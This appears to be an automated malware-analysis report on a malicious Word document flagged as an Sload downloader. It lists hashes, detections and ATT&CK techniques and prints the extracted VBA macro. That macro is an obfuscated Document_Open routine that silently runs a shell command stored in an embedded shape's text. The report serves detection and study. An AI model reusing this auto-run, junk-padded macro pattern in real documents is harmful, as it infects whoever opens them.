Office (OLE) malware analysis — malicious · 76ddd79d0ee84395

MALICIOUS

Office (OLE)

78.6 KB Created: 2018-11-06 19:20:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 1f9ff6ff0a0a7398da1cb639107c5f70 SHA-1: ee7c0c29ae72eee830a18daa7ee1dfc85b354f40 SHA-256: 76ddd79d0ee84395b6feb5a11b97af610346b95ccd8f4b9a1a2ffd46d3f0e24c

210 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a Document_Open VBA macro that executes a complex PowerShell command. This command decodes a Base64 string, decompresses it, and then executes it using PowerShell. The decoded payload is likely a second-stage downloader, as indicated by the ClamAV detection name 'Doc.Downloader.Sload-6743946-0'. The embedded URL is benign and likely a red herring.

Heuristics 7

ClamAV: Doc.Downloader.Sload-6743946-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Sload-6743946-0
Suspicious cmd.exe invocation with execution flag high SC_STR_CMD

Suspicious cmd.exe invocation with execution flag
Reference to PowerShell high SC_STR_POWERSHELL

Reference to PowerShell
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND

Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code

Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro

Matched line in script

Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next

Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1306 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1306 bytes
SHA-256: `eeae01a79ed1f2164714949f0afb1ae4af1825c2096e438ede231aa6d630175f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "iZDtoWhm" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next DZXiQr = (AafHKz + JjSGw * zHPCtd + Wfiaf + JjcpvS + JQQVfN / (kcHFM + CdwJU)) sZWbZL = WakHfl + mPIunn / (qMwso + WjZwi / sLvspj + NzQpRc + JVGtqY + kBMZik / (QqAmY + smqXTL)) nZUrEb = obhtWo + jjquX / cTuYdN + djjSV + fGjvZ + DiMIv viFQh = (VPIZLo + iHuIjl + CvsXN + AInMr / (GDXPKt + UZZEi + pStzb + XOsXzp)) HWwFP = FJTfwO + IAHrOX / IwwkR + TzPKwK + pMHjiD + EVmEz WpNcv = ahiGsj + OQtcr + zXsGK + iTXOf / Zdqvf + wIAwI + nFsOIz + uHiifi / (CRNODT + iSGYT + jjjKBP + TFTTK * PkPvu + QvJfu) ohEmlq = MSOXUh + VQzzu * (iERSX + NCpWB / YGbbOS + cVMwWs) Const iILfwj = 215064006 - 215064006 Shell@ Shapes(1).TextFrame.TextRange.Text + vfMhziQk + PadmWvN, iILfwj cKiLl = sFlzhY + ISzaHl + RLLFh + BIopPr * (jioEi + PRZAI) botBiQ = hRIva + zSHKKT * qpqMdC + zjqAJ + fmGBd + RhBzbU FIPDZ = (itCRw + iIskQ / (iqFtid + wsWzrK + mbXss + QuJZjN * jzGWhJ + ZdALi)) cbMtL = (vmCkz + ffnjfM / nMwmz + iFdIb / OGanT + jVGutz) End Sub

SHA-256: eeae01a79ed1f2164714949f0afb1ae4af1825c2096e438ede231aa6d630175f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "iZDtoWhm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   DZXiQr = (AafHKz + JjSGw * zHPCtd + Wfiaf + JjcpvS + JQQVfN / (kcHFM + CdwJU))
   sZWbZL = WakHfl + mPIunn / (qMwso + WjZwi / sLvspj + NzQpRc + JVGtqY + kBMZik / (QqAmY + smqXTL))
   nZUrEb = obhtWo + jjquX / cTuYdN + djjSV + fGjvZ + DiMIv
   viFQh = (VPIZLo + iHuIjl + CvsXN + AInMr / (GDXPKt + UZZEi + pStzb + XOsXzp))
   HWwFP = FJTfwO + IAHrOX / IwwkR + TzPKwK + pMHjiD + EVmEz
   WpNcv = ahiGsj + OQtcr + zXsGK + iTXOf / Zdqvf + wIAwI + nFsOIz + uHiifi / (CRNODT + iSGYT + jjjKBP + TFTTK * PkPvu + QvJfu)
   ohEmlq = MSOXUh + VQzzu * (iERSX + NCpWB / YGbbOS + cVMwWs)
Const iILfwj = 215064006 - 215064006
Shell@ Shapes(1).TextFrame.TextRange.Text + vfMhziQk + PadmWvN, iILfwj
   cKiLl = sFlzhY + ISzaHl + RLLFh + BIopPr * (jioEi + PRZAI)
   botBiQ = hRIva + zSHKKT * qpqMdC + zjqAJ + fmGBd + RhBzbU
   FIPDZ = (itCRw + iIskQ / (iqFtid + wsWzrK + mbXss + QuJZjN * jzGWhJ + ZdALi))
   cbMtL = (vmCkz + ffnjfM / nMwmz + iFdIb / OGanT + jVGutz)
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.